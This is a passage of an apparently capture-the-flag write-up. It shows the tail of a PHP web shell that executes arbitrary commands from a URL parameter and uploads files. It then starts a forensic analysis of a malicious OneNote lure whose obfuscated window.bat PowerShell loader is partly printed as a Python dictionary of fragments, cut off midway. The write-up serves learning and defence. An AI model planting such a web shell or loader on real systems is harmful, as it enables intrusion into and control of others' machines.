class="line"><span class="cl"><span class="err">echo &#34;&lt;input type=&#39;hidden&#39; name=&#39;dir&#39; value=&#34;.$dir.&#34; /&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err">echo &#34;&lt;input type=&#39;text&#39; name=&#39;cmd&#39; autocomplete=&#39;off&#39; autofocus&gt;\n&lt;input type=&#39;submit&#39; value=&#39;Execute&#39;&gt;\n&#34;; </span></span></span><span class="line"><span class="cl"><span class="err">echo &#34;&lt;/form&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err">echo &#34;\n&lt;br&gt;\n&lt;div class=&#39;navbar-form&#39;&gt;&lt;form action=&#39;&#34;.$_SERVER[&#39;PHP_SELF&#39;].&#34;&#39; method=&#39;POST&#39; enctype=&#39;multipart/form-data&#39;&gt;\n&#34;; </span></span></span><span class="line"><span class="cl"><span class="err">echo &#34;&lt;input type=&#39;hidden&#39; name=&#39;dir&#39; value=&#39;&#34;.$_GET[&#39;dir&#39;].&#34;&#39;/&gt; &#34;; </span></span></span><span class="line"><span class="cl"><span class="err">echo &#34;&lt;input type=&#39;file&#39; name=&#39;fileToUpload&#39; id=&#39;fileToUpload&#39;&gt;\n&lt;br&gt;&lt;input type=&#39;submit&#39; value=&#39;Upload File&#39; name=&#39;submit&#39;&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err">echo &#34;&lt;/div&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">if (isset($_POST[&#39;submit&#39;])) { </span></span></span><span class="line"><span class="cl"><span class="err"> $uploadDirectory = $dir.&#39;/&#39;.basename($_FILES[&#39;fileToUpload&#39;][&#39;name&#39;]); </span></span></span><span class="line"><span class="cl"><span class="err"> if (file_exists($uploadDirectory)) { </span></span></span><span class="line"><span class="cl"><span class="err"> echo &#34;&lt;br&gt;&lt;br&gt;&lt;b style=&#39;color:red&#39;&gt;Error. File already exists in &#34;.$uploadDirectory.&#34;.&lt;/b&gt;&lt;/br&gt;&lt;/br&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err"> } </span></span></span><span class="line"><span class="cl"><span class="err"> else if (move_uploaded_file($_FILES[&#39;fileToUpload&#39;][&#39;tmp_name&#39;], $uploadDirectory)) { </span></span></span><span class="line"><span class="cl"><span class="err"> echo &#39;&lt;br&gt;&lt;br&gt;&lt;b&gt;File &#39;.$_FILES[&#39;fileToUpload&#39;][&#39;name&#39;].&#39; uploaded successfully in &#39;.$dir.&#39; !&lt;/b&gt;&lt;br&gt;&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> } else { </span></span></span><span class="line"><span class="cl"><span class="err"> echo &#39;&lt;br&gt;&lt;br&gt;&lt;b style=&#34;color:red&#34;&gt;Error uploading file &#39;.$uploadDirectory.&#39;&lt;/b&gt;&lt;br&gt;&lt;br&gt;&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err"> } </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">} </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">if (isset($_GET[&#39;cmd&#39;])) { </span></span></span><span class="line"><span class="cl"><span class="err"> echo &#34;&lt;br&gt;&lt;br&gt;&lt;b&gt;Result of command execution: &lt;/b&gt;&lt;br&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err"> exec(&#39;cd &#39;.$dir.&#39; &amp;&amp; &#39;.$_GET[&#39;cmd&#39;], $cmdresult); </span></span></span><span class="line"><span class="cl"><span class="err"> foreach ($cmdresult as $key =&gt; $value) { </span></span></span><span class="line"><span class="cl"><span class="err"> echo &#34;$value \n&lt;br&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err"> } </span></span></span><span class="line"><span class="cl"><span class="err">} </span></span></span><span class="line"><span class="cl"><span class="err">echo &#34;&lt;br&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err">?&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">&lt;table class=&#34;table table-hover table-bordered&#34;&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> &lt;thead&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> &lt;tr&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> &lt;th&gt;Name&lt;/th&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> &lt;th&gt;Owner&lt;/th&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> &lt;th&gt;Permissions&lt;/th&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> &lt;/tr&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> &lt;/thead&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> &lt;tbody&gt; </span></span></span><span class="line"><span class="cl"><span class="err">&lt;?php </span></span></span><span class="line"><span class="cl"><span class="err">foreach ($dirs as $key =&gt; $value) { </span></span></span><span class="line"><span class="cl"><span class="err"> echo &#34;&lt;tr&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err"> if (is_dir(realpath($dir.&#39;/&#39;.$value))) { </span></span></span><span class="line"><span class="cl"><span class="err"> echo &#34;&lt;td&gt;&lt;a href=&#39;&#34;. $_SERVER[&#39;PHP_SELF&#39;] . &#34;?dir=&#34;. realpath($dir.&#39;/&#39;.$value) . &#34;/&#39;&gt;&#34;. $value . &#34;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&#34;. posix_getpwuid(fileowner($dir.&#39;/&#39;.$value))[name] . &#34;&lt;/td&gt;&lt;td&gt; &#34; . printPerms($dir) . &#34;&lt;/td&gt;\n&#34;; </span></span></span><span class="line"><span class="cl"><span class="err"> } </span></span></span><span class="line"><span class="cl"><span class="err"> else { </span></span></span><span class="line"><span class="cl"><span class="err"> echo &#34;&lt;td&gt;&lt;a href=&#39;&#34;. $_SERVER[&#39;PHP_SELF&#39;] . &#34;?download=&#34;. realpath($dir.&#39;/&#39;.$value) . &#34;&#39;&gt;&#34;. $value . &#34;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&#34;. posix_getpwuid(fileowner($dir.&#39;/&#39;.$value))[name] .&#34;&lt;/td&gt;&lt;td&gt; &#34; . printPerms($dir) . &#34;&lt;/td&gt;\n&#34;; </span></span></span><span class="line"><span class="cl"><span class="err"> } </span></span></span><span class="line"><span class="cl"><span class="err"> echo &#34;&lt;/tr&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err">} </span></span></span><span class="line"><span class="cl"><span class="err">echo &#34;&lt;/tbody&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err">echo &#34;&lt;/table&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">?&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">&lt;/div&gt; </span></span></span><span class="line"><span class="cl"><span class="err">&lt;/html&gt; </span></span></span></code></pre></div><p>Looking at the comment, we can see the flag there.</p> <p>Flag is: <strong>HTB{W0w_ROt_A_DaY}</strong></p> <h2 id="relic-maps">Relic Maps</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1oyfMzfnOM69pQdIVi9j63dkLZ2xvVkgq/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> Pandora received an email with a link claiming to have information about the location of the relic and attached ancient city maps, but something seems off about it. Could it be rivals trying to send her off on a distraction? Or worse, could they be trying to hack her systems to get what she knows?Investigate the given attachment and figure out what&rsquo;s going on and get the flag. The link is to <a href="http://relicmaps.htb" target="_blank" rel="noopener">http://relicmaps.htb</a>:/relicmaps.one. The document is still live (relicmaps.htb should resolve to your docker instance).</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Forensics</p> </li> <li> <p><strong>Difficulty:</strong> Medium</p> </li> </ul> <p>From the link attached to this challenge, we get an Onenote file named <code>relicmaps.one</code>. Analyze the file, we get 2 suspicious links, which lead us to 2 different files, <a href="https://drive.google.com/file/d/14FBabJvLlTAjhCKbJBPMk6iI9u83HI0j/view?usp=share_link" target="_blank" rel="noopener">http://relicmaps.htb/uploads/soft/topsecret-maps.one</a> and <a href="https://drive.google.com/file/d/1t9jembhbhIFY6PE7Lx3J7yA5prTsVGXv/view?usp=share_link" target="_blank" rel="noopener">http://relicmaps.htb/get/DdAbds/window.bat</a>.</p> <p>I did some analysis on the file <code>topsecret-maps.one</code>, and there are only some PNGs inside it. In the <code>window.bat</code> file, we are given a Powershell Script. You can run it directly, but I choose to deobfuscate using Python to understand its flow.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="nb">dict</span> <span class="o">=</span> <span class="s2">&#34;&#34;&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;ualBOGvshk=ws&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;PxzdwcSExs= /&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;ndjtYQuanY=po&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;cHFmSnCqnE=Wi&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;CJnGNBkyYp=co&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;jaXcJXQMrV=rS&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;nwIWiBzpbz=:</span><span class="se">\&#34;</span><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;xprVJLooVF=Po&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;tzMKflzfvX=0</span><span class="se">\&#34;</span><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;VCWZpprcdE=1.&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;XzrrbwrpmM=</span><span class="se">\v</span><span class="s2">&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;BFTOQBPCju=st&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;WmUoySsDby=he&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;tHJYExMHlP=rs&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;JPfTcZlwxJ=do&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;VxroDYJQKR=y &#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;UBndSzFkbH=py&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;KXASGLJNCX=ll&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;vlwWETKcZH=em&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;OOOxFGwzUd=e&#34;&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;NCtxqhhPqI=32&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;GOPdPuwuLd=\W&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;XUpMhOyyHB=ex&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;cIqyYRJWbQ=we&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;kTEDvsZUvn=nd&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;XBucLtReBQ=Sy&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;JBRccySrUq=ow&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;eNOycQnIZD=xe&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;chXxviaBCr=we&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;YcnfCLfyyS=in&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;lYCdEGtlPA=.e&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;pMrovuxjjq=he&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;UrPeBlCopW=ll&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;ujJtlzSIGW= C&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;zhNAugCrcK=&#34;%~0.&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">FlP%&#34;ZqjBENExAX=s</span><span class="se">\&#34;</span><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">%VhIy%&#34;dzPrbmmccE=cd&#34; </span></span></span><span class="line"><span class="cl"><span class="s2">%VhIy%&#34;xQseEVnPet= &#34;%~dp0&#34;&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;wxzMwkmbmY=gDBN&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;VavtsuhNIN=F&#39;[-&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;AHKCuBAkui=r = &#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;ARecVABHyu=uZOc&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;AbZpTpKurz=6] -&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;BaMYsIgnsM=$uZO&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;JBUgbyTPxp=m(, &#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;vGOYQQYIpx=.-16&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;yPzFwnsYdA= New&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;zuIYfGJIhV=O.Me&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;gbXeIdPSoj=&#39;[-1&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;BqEMjgsfHM=]::(&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;bivuMABwCB=Invo&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;SJsEzuInUY=ile &#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;htJeDhbeDW=();$&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;ZygfZJxAOd=acUA&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;eDhTebXJLa=&#34;%~nx0.&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;YlKbYsFYPy=in $&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;jdKMRqipbM=e]::&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;GVIREkvxRa=();$&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;OckpqzbYcn=n &#39;&#39;&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;UPfjubfNXt=Mr, &#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;AkaPyEXHFq=esMa&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;LODxmGMGqq=flec&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;hImzprlFyw=pose&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;VZAbZqJHBk=1] -&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;WYJXnBQBDj= [Sy&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;rSVBNvbdPT=stem&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;tVtxVGNpFB=vert&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;tHHIjVCHeH=::De&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;WvjMoIIiUn=);$b&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;vmIEtsktnA=ypto&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;AbMyvUGzSH=fore&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;zDUDeXKPaV=..-1&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;INPLAzQfUo== [S&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;ArAxZuPIrp== $B&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;nGqMpclaJV=ZOcm&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;lfYSggLrsL=null&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;eQPFkQsLmh=hy.A&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;AyyrPvjwjr=;$mN&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;rjhOhltPzI=Disp&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;WojQSFImBz=17js&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;SKEwAQBRlN=$Nlg&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;KytxcYPZKt=YiLG&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;RGlZIMTaRM=urit&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;igJmqZApvQ=ss -&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;dGSGnKbkQW=pose&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;lSUnvlNyZI=tem.&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;rddZbDFvhl=)))&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;KHqiJghRbq=and &#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;WPGlloqWfh=ddin&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;pLUeCEDcNj=]::C&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;drymkVAnZW=);$B&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;KdByPVjCnF=ring&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;VnDoNvCbDL=orF&#39;&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;GapFScCcpe=ke($&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;iVrCyJhMiJ=fc6t&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;oMsMdPYmPd=ert]&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;odWdfvJnBE=Lk =&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;ekEoGMuERC=yste&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;QMmDXFyyag=Syst&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;cYinxarhDL=lit(&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;bIgeRgvTeJ=ap.T&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;acXjUrxrpX=raph&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;SCbDgQuqTU=ay()&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;YYKSCuCbgJ=New-&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;YnGvhgYxvb=cm =&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;vnHosfjdeN=;$Pt&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;LIQYgFxctD=d;$B&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;olHsTHINJO=[Env&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;WQqetkePWs=NVPb&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;AGOCIKFMEK=::(&#39;&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;QbKdEZdxpx=uGcO&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;RWcegafVtf=daeR&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;ESpdErsKEO=pher&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;kJjQuXIjOT=.Con&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;dbDMRBPrxg=uGcO&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;mBIWiJNHWZ=esaB&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;WmHvayPxwd=.Mem&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;oQYrpYRHsU=stem&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;HFLAqJuuyu=ew-O&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;JhYYmEHfJT=ing(&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;pTKKchMUFD=BC;$&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;vShQyqnqqU=exe&#34;&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;PjdRUyhsyG=[]] &#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;VUeZKgDBUe=.Com&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;oNvGdyNkLt=oArr&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;IAkZpnEseT=UA.I&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;haSZYOmkiA=bstr&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;tzSNMWchGN=]::N&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;YKwLsVwqOj=Fina&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;MFRjJyYsrs=k; }&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;EdLUuXiTNo=File&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;nMbUuONTOk=7;$B&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;OAsjgKHKoH= = N&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;LLNnWnTLBJ=$bTM&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;xVIsxobyZi= &#39;&#39;)&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;pUKFMEPFQs=onve&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;DDiJEpaiME=acUA&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;ENADhKPHot= [st&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;WTAeYdswqF=.IO.&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;hVncqdtHrj=[Sys&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;EUwICZcugV=);$N&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;USLedfRsdA=ispo&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;YULKJDZpgz=t Sy&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;BlIFABuPAW=ress&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;gNabAkLFGN=();$&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;cGJiVEdEzp=ZOcm&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;OpWuyrggtP=ddin&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;NbOjNijxuU=.Len&#34; 